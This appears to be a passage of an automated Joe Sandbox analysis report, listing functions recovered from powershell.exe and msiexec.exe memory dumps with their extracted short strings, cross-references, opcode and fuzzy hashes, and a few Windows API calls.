4']q, xrefs: 0729E80B
d%cq, xrefs: 0729E795

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-720800717
Opcode ID: 1d31ef6952d6d93d0a7ff7ef43753167129a433df64b870ed9f612fffcf5fe27
Instruction ID: 964d3acda030996206ddd126cdc60b334394f1fd0f86260c177884aff1546fe9
Opcode Fuzzy Hash: 1d31ef6952d6d93d0a7ff7ef43753167129a433df64b870ed9f612fffcf5fe27
Instruction Fuzzy Hash: D8C138B2F20207DFDF24CF69C5506BABBE6BF84710F19847AD8058B290DA71D941C7A1

Function 07297808 Relevance: 14.2, Strings: 11, Instructions: 465COMMON

Download Yara Rule

Strings

$]q, xrefs: 07297B9C
$]q, xrefs: 07297CEF
4']q, xrefs: 072978BE
4']q, xrefs: 07297AB5
$]q, xrefs: 07297D26
tP]q, xrefs: 07297C38
d5zk, xrefs: 07297A86
tP]q, xrefs: 07297C2C
4']q, xrefs: 07297ABF
4']q, xrefs: 072978B2
$]q, xrefs: 07297D1A

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$d5zk$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-3555868966
Opcode ID: 8c79c1cd2de8cbe24a4d433d5213857b3255149489044e51f692476d91a03cd8
Instruction ID: 09dcbe7374285b4f355e0462d8fbffd8db8d7f480d4c6bb14c0dcc2638ac998e
Opcode Fuzzy Hash: 8c79c1cd2de8cbe24a4d433d5213857b3255149489044e51f692476d91a03cd8
Instruction Fuzzy Hash: D0E13AB1B343479FCF254B78891076ABBA6EFD2310F1C88BAD9458B351DA71C846C3A1

Function 0729A860 Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

$]q, xrefs: 0729A9E6
4']q, xrefs: 0729AB64
$]q, xrefs: 0729A8D9
4']q, xrefs: 0729AA0B
4']q, xrefs: 0729AA17
tP]q, xrefs: 0729A967
4']q, xrefs: 0729AB6E
tP]q, xrefs: 0729A95B
$]q, xrefs: 0729A8BD
$]q, xrefs: 0729A9D6

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-2309685269
Opcode ID: dabe0311688fc8365cc428ac6ccb690b0cb4f8e6aa16951dfca28b15fc875bef
Instruction ID: 5b2bcd5921c97c43e8c9e26143f146b6d778dcc9e981c37dd1fdcf33a4271731
Opcode Fuzzy Hash: dabe0311688fc8365cc428ac6ccb690b0cb4f8e6aa16951dfca28b15fc875bef
Instruction Fuzzy Hash: CDA136B1B203069FDF249E68C95066ABBF6FFC4710F18C87AD8468B250CA71D945C7A1

Function 0729EE00 Relevance: 11.5, Strings: 9, Instructions: 283COMMON

Download Yara Rule

Strings

tP]q, xrefs: 0729EF51
(cq, xrefs: 0729F012
4']q, xrefs: 0729F124
tP]q, xrefs: 0729F04C
(cq, xrefs: 0729F076
(cq, xrefs: 0729F0B5
$]q, xrefs: 0729EE7D
tP]q, xrefs: 0729EF5D
(cq, xrefs: 0729F080

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
API String ID: 0-248005275
Opcode ID: 570ffdee16a9ca118d6ebba5a3cdd07746f3e9030c13cd0191207b06f4018da7
Instruction ID: c7cbc8cbb8927093ff47b699407fb7fd4472a693662d0defe496756809dbd814
Opcode Fuzzy Hash: 570ffdee16a9ca118d6ebba5a3cdd07746f3e9030c13cd0191207b06f4018da7
Instruction Fuzzy Hash: 80A1F971B20207DFCF64CF58CA40A6AB7E6EF89710F59847AE8059B294DB71DC41C7A1

Function 07297E18 Relevance: 10.3, Strings: 8, Instructions: 321COMMON

Download Yara Rule

Strings

$]q, xrefs: 07297E2A
tP]q, xrefs: 07297EA1
4']q, xrefs: 07298025
$]q, xrefs: 072980FE
$]q, xrefs: 07297E5C
4']q, xrefs: 07298019
tP]q, xrefs: 07297E95
$]q, xrefs: 07297E50

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-1910532044
Opcode ID: c57af3e991acebeb8ac59106d59b4c133e49f22be5daad3f9d9ee23e9002c04c
Instruction ID: 4b5195099e59a1b0e01df7793aa378476ab7452cc785e5b9e6c4ead47b0f8c29
Opcode Fuzzy Hash: c57af3e991acebeb8ac59106d59b4c133e49f22be5daad3f9d9ee23e9002c04c
Instruction Fuzzy Hash: 03A136B27342468FCF249A79891076ABBE6EFC6710F1C887AD445CB352DA72C845C7A1

Function 0729F003 Relevance: 10.1, Strings: 8, Instructions: 103COMMON

Download Yara Rule

Strings

4']q, xrefs: 0729F130
(cq, xrefs: 0729F012
4']q, xrefs: 0729F124
tP]q, xrefs: 0729F04C
tP]q, xrefs: 0729F058
(cq, xrefs: 0729F076
(cq, xrefs: 0729F0B5
(cq, xrefs: 0729F080

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$(cq$(cq$(cq$(cq
API String ID: 0-3567107179
Opcode ID: 8e3f931869f241b4dd2ff88c20a5e5e894101cf4d17a48cd06d08db7f9e9df26
Instruction ID: f798238a6cc8744a7e84cbe312f882bfd38f170c71bdd5146a3b6985822c9540
Opcode Fuzzy Hash: 8e3f931869f241b4dd2ff88c20a5e5e894101cf4d17a48cd06d08db7f9e9df26
Instruction Fuzzy Hash: 4D31FD70760116DFCF649F58CB10B6B7BAAEF88710F698869ED41AB394CA719C01C7E1

Function 07290850 Relevance: 9.0, Strings: 7, Instructions: 206COMMON

Download Yara Rule

Strings

$]q, xrefs: 072908BF
4']q, xrefs: 072908E4
$]q, xrefs: 072908A3
$]q, xrefs: 072908CB
4']q, xrefs: 07290A65
4']q, xrefs: 07290A75
4']q, xrefs: 072908F0

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q
API String ID: 0-3877577046
Opcode ID: 1068d4b1077c115bcbd6cc56d2c3e2693b739bcd5fc3487a4fdaa8ebb682d4dc
Instruction ID: 594be6604dd5366a4ff4379ddace41c00f50f01e9ae162aa249cd6ac19ab0d7c
Opcode Fuzzy Hash: 1068d4b1077c115bcbd6cc56d2c3e2693b739bcd5fc3487a4fdaa8ebb682d4dc
Instruction Fuzzy Hash: 046157B172030B8FDF389A6D851066ABBE6EFC6710F28887AD945CB351DA35C841C7E1

Function 0729BECE Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

x.{k, xrefs: 0729C50D
-{k, xrefs: 0729C544
4']q, xrefs: 0729C347
4']q, xrefs: 0729C28D
4']q, xrefs: 0729C2A3
4']q, xrefs: 0729C331

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$x.{k$-{k
API String ID: 0-3535003682
Opcode ID: f02d7ef1f77192a7df68b57de82564a236ee572e8c3f568514aa3a322c719453
Instruction ID: 86a9cb00dcfaaacb4d5131de123b955a14227771d2b58de41d7f5bc04c1174a9
Opcode Fuzzy Hash: f02d7ef1f77192a7df68b57de82564a236ee572e8c3f568514aa3a322c719453
Instruction Fuzzy Hash: C2124374A102159FDB64DB58CA50BEEBBB2FF89304F1085E4D9096B341CB72AD85CF91

Function 0729DBC0 Relevance: 7.7, Strings: 6, Instructions: 211COMMON

Download Yara Rule

Strings

4']q, xrefs: 0729DCEB
$]q, xrefs: 0729DDD6
4']q, xrefs: 0729DCDF
$]q, xrefs: 0729DCC1
$]q, xrefs: 0729DCB1
$]q, xrefs: 0729DC66

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$$]q
API String ID: 0-1480752206
Opcode ID: e20e204d7c1e1b5d0947ea44f972d916e67d19ac0e5d80e3843571222dce00b4
Instruction ID: d4340eef71b76a17341075b6d0ba0490d76811977b3b9bf84f9ee28e77702ae6
Opcode Fuzzy Hash: e20e204d7c1e1b5d0947ea44f972d916e67d19ac0e5d80e3843571222dce00b4
Instruction Fuzzy Hash: B46104B172420ADFCF289F79C4106AABBA6AFC2310F18C47AD8498B251DB75D845D7E1

Function 0729E569 Relevance: 7.7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

Strings

$]q, xrefs: 0729E648
tP]q, xrefs: 0729E761
d%cq, xrefs: 0729E727
4']q, xrefs: 0729E7FF
d%cq, xrefs: 0729E78B
d%cq, xrefs: 0729E795

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
API String ID: 0-3562389410
Opcode ID: e8baef18277d287a9d4de31843808f782aa6c4c532a8f540d83348ae6e5d7dcb
Instruction ID: c955c5c816f15a15a83e0972348602c861a8b35adcd333485e86dc80ebf15499
Opcode Fuzzy Hash: e8baef18277d287a9d4de31843808f782aa6c4c532a8f540d83348ae6e5d7dcb
Instruction Fuzzy Hash: 1451A5B6E20246DFCF24CE55C540ABAB7E2BF85610F1E8479D8059B291DB71DC41CBA2

Function 07290548 Relevance: 6.4, Strings: 5, Instructions: 152COMMON

Download Yara Rule

Strings

$]q, xrefs: 0729060D
$]q, xrefs: 07290619
4']q, xrefs: 07290636
$]q, xrefs: 072905D4
4']q, xrefs: 07290642

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 47b3696598d604bd581a396c1b73bc5179bd823fe38dcfc8b7d176f4f8e43eda
Instruction ID: 666d5f1cbaaa67c5672565e53857f8c3f8a66fec249cd4d07602feb90e0ee479
Opcode Fuzzy Hash: 47b3696598d604bd581a396c1b73bc5179bd823fe38dcfc8b7d176f4f8e43eda
Instruction Fuzzy Hash: CA4149B072420BDFCF355A2885106BA7BE2EFC1210F18447ED845CB291DB32C946C7A2

Function 0729E6AE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

tP]q, xrefs: 0729E761
d%cq, xrefs: 0729E727
4']q, xrefs: 0729E7FF
d%cq, xrefs: 0729E78B
d%cq, xrefs: 0729E795

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$d%cq$d%cq$d%cq$tP]q
API String ID: 0-1723543176
Opcode ID: 3f5ee8b2c3f080442868f2460fb26003939dc3904e38e9c0138ee40c3caaf4a4
Instruction ID: ba1f19ea1c8ab13e19f5fc7172444df2bd452ccaaa06057e6352e84830ec2b3b
Opcode Fuzzy Hash: 3f5ee8b2c3f080442868f2460fb26003939dc3904e38e9c0138ee40c3caaf4a4
Instruction Fuzzy Hash: 5F3187B5F20216DFCB24DF58C594EA9B7B2BF88720F1A8969E8055B350C772DC41CBA1

Function 0729DE78 Relevance: 5.5, Strings: 4, Instructions: 492COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0729DF5E
(o]q, xrefs: 0729E2A1
(o]q, xrefs: 0729DF6E
(o]q, xrefs: 0729E2B1

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q
API String ID: 0-1261621458
Opcode ID: 7e949d8304c4c6aaaad3e9133d92432b14fd3d2993a9259a4ccbc955d660e4b3
Instruction ID: a73478565323826f7cdf3a9e93b9067487416e6e493c93018892df515f97b86c
Opcode Fuzzy Hash: 7e949d8304c4c6aaaad3e9133d92432b14fd3d2993a9259a4ccbc955d660e4b3
Instruction Fuzzy Hash: BEF127B2B24246DFCF15CF68C804BAA7BA6EF85710F1D84BAE4158B291DB31D845C7A1

Function 0729A488 Relevance: 5.3, Strings: 4, Instructions: 285COMMON

Download Yara Rule

Strings

4']q, xrefs: 0729A79D
4']q, xrefs: 0729A791
4']q, xrefs: 0729A508
4']q, xrefs: 0729A4FC

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: cc96607b0f76efcbce26d57bdb829535e99b2f93f3276c3a8158320e84cf51b4
Instruction ID: 5da53cd3b5befae1992dde387c9c721769d8930d243772b53efd0c8e83d91a19
Opcode Fuzzy Hash: cc96607b0f76efcbce26d57bdb829535e99b2f93f3276c3a8158320e84cf51b4
Instruction Fuzzy Hash: 2FA1F4B0B243079FCF24DB6895546AABBF6AFC5210F28C4BAD905CB251DB35C846C7A1

Function 07299E80 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

4']q, xrefs: 0729A083
tP]q, xrefs: 07299F18
tP]q, xrefs: 07299F0C
4']q, xrefs: 0729A08F

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q
API String ID: 0-3637193552
Opcode ID: 3c1bcc1252ec529dc41366f87b7d4f23dc6bb1d13e10c2ba93528076a4401cce
Instruction ID: ce747fa46823ec3bd3e68580d844e58deb9c21d38ccd1745749cef265204bf6a
Opcode Fuzzy Hash: 3c1bcc1252ec529dc41366f87b7d4f23dc6bb1d13e10c2ba93528076a4401cce
Instruction Fuzzy Hash: A68145B17143068FCB648A7C980466ABBF6EFC6320B1CC4BAD549CB251EA72DC45C7A1

Function 07299A10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07299A6C
$]q, xrefs: 07299A3E
$]q, xrefs: 07299A22
$]q, xrefs: 07299A78

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 45b885236cdc84290184d454eb7afa088222412e25303215678322d42b1b4bda
Instruction ID: cd01bb32b1c7813d882dbc2790c68fffa0bcc600e34fc6c23493f03a97c350a3
Opcode Fuzzy Hash: 45b885236cdc84290184d454eb7afa088222412e25303215678322d42b1b4bda
Instruction Fuzzy Hash: 692131B13202065BDF38556E8950B6776DAEBC1621F28883EA8C9CB381DD76E881C360

Function 0729AC46 Relevance: 5.1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

Strings

$]q, xrefs: 0729ACC3
$]q, xrefs: 0729AD07
$]q, xrefs: 0729ACA7
$]q, xrefs: 0729ACEB

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 6f3be4b6ee49312a34fa29218dafd10b53f70d99b7617a09eede2b57e003ae0e
Instruction ID: 29a05509247d486996721828efa43d078d339909e36e0422839b3886eff2d3d9
Opcode Fuzzy Hash: 6f3be4b6ee49312a34fa29218dafd10b53f70d99b7617a09eede2b57e003ae0e
Instruction Fuzzy Hash: 25219AB5A3030B9BDF388E69C58066AB7B4BF85612F2DC47AD8459B201DB32D444C7A2

Function 072903E1 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

$]q, xrefs: 07290436
$]q, xrefs: 0729042A
4']q, xrefs: 0729044B
4']q, xrefs: 07290457

Memory Dump Source

Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: fcd7f16ee14c833a1ac1c7fa701dbcd834572fe1556130f092df3a9a5b132cc4
Instruction ID: 8e472acc3a330413fa9b7b4240c666e96c983d8b1381f54fd576e5415dc36fe2
Opcode Fuzzy Hash: fcd7f16ee14c833a1ac1c7fa701dbcd834572fe1556130f092df3a9a5b132cc4
Instruction Fuzzy Hash: 7901497172424B4FCB3917BD16201657BE29FC1970B6D09B6C494CB396CD254C468397

Analysis Process: msiexec.exePID: 3876, Parent PID: 6396COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	8

Executed Functions

Function 279A2380 Relevance: 14.0, Strings: 10, Instructions: 1527COMMON

Download Yara Rule

Strings

$]q, xrefs: 279A387B
$]q, xrefs: 279A3863
46', xrefs: 279A2998
$]q, xrefs: 279A383A
&l/6, xrefs: 279A2BDA
$]q, xrefs: 279A3887
$]q, xrefs: 279A3857
46', xrefs: 279A2D1D
66', xrefs: 279A31BC
$]q, xrefs: 279A382E

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: &l/6$$]q$$]q$$]q$$]q$$]q$$]q$46'$46'$66'
API String ID: 0-402271968
Opcode ID: 728aa8659761690ae12892737a65bc4ffa4ab78a9916d66067db4fa6b84868dd
Instruction ID: d95238a8fda86e9f59510ea5a119c62815b2dbf1506d5a28418814a94d7dd5b6
Opcode Fuzzy Hash: 728aa8659761690ae12892737a65bc4ffa4ab78a9916d66067db4fa6b84868dd
Instruction Fuzzy Hash: 98E21534A01309CFCB14DF68C584A9DB7F6FF89314F6585A9D409AB266EB34ED85CB80

Function 279AB300 Relevance: 10.8, Strings: 8, Instructions: 766COMMON

Download Yara Rule

Strings

$]q, xrefs: 279ABC59
$]q, xrefs: 279ABCCD
$]q, xrefs: 279ABCC1
$]q, xrefs: 279ABC99
$]q, xrefs: 279ABC8D
HR6', xrefs: 279ABC21
HR6', xrefs: 279ABC13
$]q, xrefs: 279ABC65

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: HR6'$HR6'$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3302286543
Opcode ID: 2a8f20ec607798494f82fdc32c92ab2d5acb109cb20680e7ca8f5ac32198cf0c
Instruction ID: adaee63b00cbb51d7867ea76e7254c7a2cf6ca34fb9afb71107e641c6fddead1
Opcode Fuzzy Hash: 2a8f20ec607798494f82fdc32c92ab2d5acb109cb20680e7ca8f5ac32198cf0c
Instruction Fuzzy Hash: 15526F70A01309CFDB15CB68D590B9DB7FAEB85318F208969D409EB392DB39DD81CB91

Function 0037E370 Relevance: 2.8, Strings: 2, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 0037E477
$]q, xrefs: 0037E45E

Memory Dump Source

Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_370000_msiexec.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 4d3953de0db8f6fc4596ac57378cb7efd5c216fd05244b44a663fac1c2534b87
Instruction ID: af641c6518cffd6029485933731934888894219ff1f89cfdfcb026606536fd06
Opcode Fuzzy Hash: 4d3953de0db8f6fc4596ac57378cb7efd5c216fd05244b44a663fac1c2534b87
Instruction Fuzzy Hash: D7B1C674B042589BCB1EAB79889467E7BABBFC8710B14C46DD40BD7394DE38DC029792

Function 00374A58 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b835c37882321df869e17cfa6c559271ad956426d3eea7682581dd122f57fa11
Instruction ID: 3221050f50848ae1eee4102ffcc71546b35a2dcacb91575d6135dc38ef6293bd
Opcode Fuzzy Hash: b835c37882321df869e17cfa6c559271ad956426d3eea7682581dd122f57fa11
Instruction Fuzzy Hash: 1BB15E70E00209DFDF26CFA9C98579DBBF2AF88314F15C129D859E7254EB78A845CB81

Function 279AAD98 Relevance: 12.9, Strings: 10, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XM3, xrefs: 279AB169
$]q, xrefs: 279AAEB9
$]q, xrefs: 279AAF70
$]q, xrefs: 279AAF47
XM3, xrefs: 279AB24A
$]q, xrefs: 279AAEC5
$]q, xrefs: 279AAF0C
$]q, xrefs: 279AAF3B
$]q, xrefs: 279AAF64
$]q, xrefs: 279AAF18

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: XM3$XM3$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-395432648
Opcode ID: 08cf0870bb08c714490fd5760bfed32c2689c033a0dadd162bd8f98170dc3d2d
Instruction ID: 91d5af96634ebc8dadd7ed7e55c8a6ef0ab874a3385050c3f111c1524c29d6ca
Opcode Fuzzy Hash: 08cf0870bb08c714490fd5760bfed32c2689c033a0dadd162bd8f98170dc3d2d
Instruction Fuzzy Hash: 89E16F30A0130ACFCB19DF68D480A9EB7B6EF85308F20856AD409EB355DB79DD46CB95

Function 2798320A Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2798328E
GetCurrentThread.KERNEL32 ref: 279832CB
GetCurrentProcess.KERNEL32 ref: 27983308
GetCurrentThreadId.KERNEL32 ref: 27983361

Memory Dump Source

Source File: 00000006.00000002.3310823823.0000000027980000.00000040.00000800.00020000.00000000.sdmp, Offset: 27980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27980000_msiexec.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: fb50545bc38854fcfaf85e9479380ff4a9d10592ae47edb81efce2960383eadb
Instruction ID: 9d5457a1f21edb5ccd9f2ccf5cac959944e1716628db4085e97504f98f3a7f9d
Opcode Fuzzy Hash: fb50545bc38854fcfaf85e9479380ff4a9d10592ae47edb81efce2960383eadb
Instruction Fuzzy Hash: 765137B0900349DFEB14DFA9D588BEEBBF5EF88314F208459E419A7250D7389940CB65

Function 27983210 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2798328E
GetCurrentThread.KERNEL32 ref: 279832CB
GetCurrentProcess.KERNEL32 ref: 27983308
GetCurrentThreadId.KERNEL32 ref: 27983361

Memory Dump Source

Source File: 00000006.00000002.3310823823.0000000027980000.00000040.00000800.00020000.00000000.sdmp, Offset: 27980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27980000_msiexec.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 972c457f4c50a0a67f34d70c85efa91c67d4a5d5cbde585526eabf98e65f0367
Instruction ID: fb1249902725968d73492c39ccd321968c8b0b5e0c7b4e46363a750fe494dcd0
Opcode Fuzzy Hash: 972c457f4c50a0a67f34d70c85efa91c67d4a5d5cbde585526eabf98e65f0367
Instruction Fuzzy Hash: B75137B0900349DFEB14DFAAD588BAEBBF5EF88314F208459E419A7360D7389940CB65

Function 003787B9 Relevance: 3.1, Strings: 2, Instructions: 553
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H6', xrefs: 00378B54
6', xrefs: 00378B24

Memory Dump Source

Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_370000_msiexec.jbxd

Similarity

API ID:
String ID: H6'$6'
API String ID: 0-1045960458
Opcode ID: b886647224c245ba98fe5333a47beb8114fbb890edeae716e8590119579d01b2
Instruction ID: 0c46bceb957f085b6873fde5631b86070d361a685aaa6c327cacbd48bef902f1
Opcode Fuzzy Hash: b886647224c245ba98fe5333a47beb8114fbb890edeae716e8590119579d01b2
Instruction Fuzzy Hash: 4F1251307001019FCB2AAB28D4D9A1973A7EF89345F54897AE40ADF395CFB9DC46CB91

Function 279A21E5 Relevance: 2.6, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 279A2333
&T/6, xrefs: 279A21F2

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: &T/6$PH]q
API String ID: 0-2223671251
Opcode ID: f675ccc5a7b6cc6f0dc915e135d540c589f43690b34b3991c4890d0af0aab4f9
Instruction ID: a1345a889e51cfebc4b1974912ec73d01d4eb66f56758ef159b4fbe1ba269459
Opcode Fuzzy Hash: f675ccc5a7b6cc6f0dc915e135d540c589f43690b34b3991c4890d0af0aab4f9
Instruction Fuzzy Hash: 9A319D30B003058FCB0A9B74C554A5F7BEAABCA615F2484A8D806DB395EE35DD468B91

Function 2798B718 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 2798B97E

Memory Dump Source

Source File: 00000006.00000002.3310823823.0000000027980000.00000040.00000800.00020000.00000000.sdmp, Offset: 27980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27980000_msiexec.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 60abe699029960e2b98febbbe7ed7bb7994e8af0929c6f45fc2dadd1ea4e9202
Instruction ID: 2342fc2790aba5aa6638891bad9c2313800635586de0d43088706ba9b173f5e0
Opcode Fuzzy Hash: 60abe699029960e2b98febbbe7ed7bb7994e8af0929c6f45fc2dadd1ea4e9202
Instruction Fuzzy Hash: 6B812470A00B058FD724DF29C08175ABBF5FF48308F04896ED58ADBA50D779E945CB95

